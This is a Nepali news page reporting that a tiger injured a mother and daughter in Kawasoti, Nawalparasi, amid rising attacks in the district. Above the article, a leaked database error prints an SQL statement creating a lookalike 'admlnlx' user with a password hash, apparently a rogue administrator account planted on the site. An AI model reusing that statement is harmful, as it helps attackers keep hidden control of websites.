WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6jDI1GU97Y74vFJrleZU3iB3NNK5Q.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-03 01:07:40', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
नवलपरासीमा बाघको आक्रमणमा परी २ घाइते – Gaule Khabar

नवलपरासीमा बाघको आक्रमणमा परी २ घाइते

नवलपरासीमा बाघको आक्रमणमा परी २ घाइते

नवलपरासी,माघ ३-

जिल्लाको कावासोती-१६ डण्डामा बाघको आक्रमणमा परि सोमबार दुई जना घाइते भएका छन् ।

घर नजिकैको जंगलमा घाँस-दाउरा खोज्न जादा ५० वर्षीय सुमित्रा गिरी र छोरी २८ वर्षीय टोप माया गिरीलाई बाघले आक्रमण गरेको प्रहरीले जनाएको छ ।

घाइतेमध्ये आमा सुमित्राको अवस्था गम्भीर रहेको छ । घाइते दुवैको स्थानीय मध्यविन्दु सामुदायिक अस्पतालमा उपचार हुन नसकेपछि भरतपुर पठाइएको छ । पछिल्लो केही महिना यता जिल्लामा बाघको आक्रमण बढेको छ ।

मंसिरदेखि अहिलेसम्म बाघको आक्रमणबाट ३ जनाको मृत्यु भइसकेको छ । नरभक्षी बाघले लगातार आक्रमण गरेपनि आक्रमण गर्ने बाघको खोजी नगर्दा सर्वसाधारणमा त्रास फैलिएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका